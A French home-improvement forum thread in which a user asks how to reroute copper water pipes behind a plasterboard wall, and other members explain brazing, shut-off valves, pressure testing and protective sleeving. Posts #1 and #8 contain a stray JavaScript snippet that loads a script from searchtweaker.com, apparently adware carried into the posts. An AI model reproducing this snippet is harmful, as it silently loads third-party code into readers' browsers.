tuyaux cuivre derrière une cloison ?

  1. call13
    Autre Pays
    salut a tous
    je pense commencer des travaux dans ma salle de bain pour une rénovation complète
    mais pour cela,l'arrivé de la plomberie devra être déplacé.
    elle arrive pour le moment par le sol,et elle sera prévue a la fin des travaux sur le mur d'en face (voir le dessin)
    est t'il possible de souder les tuyaux et de les faire passer derrière la cloison jusqu'a l'endroit voulu ?
    merci

    [​IMG]
    (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
     
    call13 , 28 Octobre 2013
    #1
  2. dsm28
    dsm28
    Supporter
    (28) Eure-et-Loir
    bonjour, aucun soucis à partir du moment où tu fixe correctement ces tuyaux au mur bien voir à leurs hauteur en rapport au sol pour que rien en fixation sur votre cloison ne viens faire le percement des tubes .
    par colier Atlas que les emboitures soit faites correctement ainsi que tes brasures. et le point important ! la mise en place de manchons de protection contre le géle !*
    suivant emplacement de cette pièce dans maison où appartement !
    il est judicieux de mettre des vannes de coupure sur les deux circuits eau chaude et froide de cette façon si besoin intervention sur circuit pas besoin de faire coupure général mettre en préssion avant finition de la cloison pour être sur de ne pas avoir la moindre fuite ! mais si travail correcte y à aucune raison d'avoir peur .
    Voilà y à plus ka ! bon montage.
     
    dsm28 , 28 Octobre 2013
    #2
  3. COUTURE_78
    (78) Yvelines
    Salutation Call13,

    Il est aussi important de noter quelque part la position des cuivres et l'endroit des brasures éventuelles (par exemple en faisant qq photos) AVANT le placage en BA13 afin de pouvoir te reporter à tes notes + tard (ou re-preneur de ton habitation) afin de ne pas percer un tuyau par erreur plus tard. DSM28 a grandement raison d'insister sur la nécessité d'un test en pression avant le placage.

    Bon boulot - Cordialement.
     
    COUTURE_78 , 28 Octobre 2013
    #3
  4. dsm28
    dsm28
    Supporter
    (28) Eure-et-Loir
    ;-) Pour reprendre le post la mise en place des tuyaux à max 20cm du sol doit convenir parfaitement !
    moi même et couture 78 NOUS TE DISONS LA MÊME CHOSE DONC déjà deux avis identique ! c'est pas rien ! nb ! quand je parle brasure c'est bien brasure phosphore à 720°C et non soudures à 250 °C c'est pas la même chose ! attention sur ce point ! nb ! pour aller plus loin ! la soudure à l'étain bein çà tiens également pas
    mal ! atention à la préparation du cuivre ! c'est le secret ! et l'utilisation de décapant ! borax , castolin , ps10 ETC.... MARCHE BIEN ! bon y à plus KA !
    bien cordialement
    si pbs envois photos ! 8-| 8-|
     
    Dernière édition par un modérateur: 28 Octobre 2013
    dsm28 , 28 Octobre 2013
    #4
  5. call13
    Autre Pays
    super,j'ais les infos qu'il me faut,merci a vous.
     
    call13 , 29 Octobre 2013
    #5
  6. dsm28
    dsm28
    Supporter
    (28) Eure-et-Loir
    Un point important ! lors du passage du cuivre dans cloison ba13 prend des bouts de gaine en 20 icta pour la protection des tuyaux en cuivre avec le plâtre où enduis ! pas de contact direct entre cuivre et plâtre c'est bon à savoir également !
    tu coupe la gaine au cutter sur la longueur attention au doigts lors de cette coupe ! faire çà sur une planche de bois à la rigueur ! où avoir cisaille fine !
    La mise en place de collier ATLAS isophonique (avec bande caoutchouc) sur eau chaude est pas une mauvaise idée ! si tu as des morceaux de chambre à air de vélo çà marche également trés bien ! pas de perturbation où bruit lors dilatation des tuyaux ! je dis çà comme çà c'est mieux de prévoir avant çà coute rien ! en plus !
    bon montage .


    nb vous pouvez nous dire de quel pays ? voir votre profil svp ! ;-)
     
    Dernière édition par un modérateur: 30 Octobre 2013
    dsm28 , 30 Octobre 2013
    #6
  7. vété
    (76) Seine-Maritime
    J'abonde dans le sens de DSM28. Notre proprio avait eu la mauvaise idée de ne pas protéger les raccord cuivre de la douche de notre voisine. Résulat, les raccords se sont fait bouffer et il a passe deux jours à démonter la sdb pour trouver d'où venait la fuite qui arrivait dans notre cave. Un mètre de gaine il y a dix ans aurait évité tout ça.
     
    vété , 30 Octobre 2013
    #7
  8. call13
    Autre Pays
    elle sert a quoi cette gaine icta ? ,j'ais vu des tuyaux de cuivre gainés avec une gaine blanche en caoutchou ,mais c'est pour le gaz ça non ?
    c'est bon aussi pour l'eau ?
    si c'est de cette gaine qu'il s'agit,en quoi empeche t'elle une fuite ? l'eau va suivre la gaine et couler la ou la gaine se termine ?
    [​IMG]
    (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
     
    Dernière édition par un modérateur: 31 Octobre 2013
    call13 , 31 Octobre 2013
    #8
  9. dsm28
    dsm28
    Supporter
    (28) Eure-et-Loir
    Un morceau de gaine icta en exemple comme sur votre photo c'est simplement pour ne pas avoir contact entre le plâtre et le cuivre lors passage de la cloison et non sur la longueur de vos tuyaux !
     
    dsm28 , 31 Octobre 2013
    #9
  10. call13
    Autre Pays
    le platre "attaque" le cuivre ? !! je découvre l'information !!! ?...
     
    call13 , 31 Octobre 2013
    #10
  11. dsm28
    dsm28
    Supporter
    (28) Eure-et-Loir
    eh oui ! c'est bien pour çà que le forum est là ! partage de notre savoir faire !
    c'est comme de faire la pose de manchon contre le froid autour des tuyaux derrieres les cloisons ! en fonction de l'endroit de la pièce et du batiment maison , appartement et emplacement !
    Pour section de 14 où 16 des tuyaux la gaine ICTA en 20 est pratique souvent quelques chuttes sont dispo quand y à un chantier donc même pas besoin de faire achat ! tout autre gaine pvc en protection marche également trés bien !
    et pour dire que le plâtre bouffe le cuivre çà c'est une certitude ! à plus où moins long therme la dégradation peut être très rapide en millieu humide !
    voilà tu as l'info ! à toi de faire les choses bien !
    un simple merci une fois chantier fini et pourquoi pas quelques photos c'est tout ce que nous te demandons .
    bien sur si besoin reviens nous voir ! le forum est toujours ouvert !
    Bien cordialement
     
    dsm28 , 31 Octobre 2013
    #11
Chargement...
Autres sujets similaires Forum Date

corrosion des tuyaux en cuivre

Plomberie générale 3 Mai 2013

Identification type de tuyaux

Plomberie générale 26 Février 2016

bruit dans tuyaux chauffage

Plomberie générale 21 Décembre 2014

bruit dans les tuyaux d'eau froide

Plomberie générale 3 Septembre 2013

tuyaux plomberie derrière BA 13

Plomberie générale 30 Avril 2012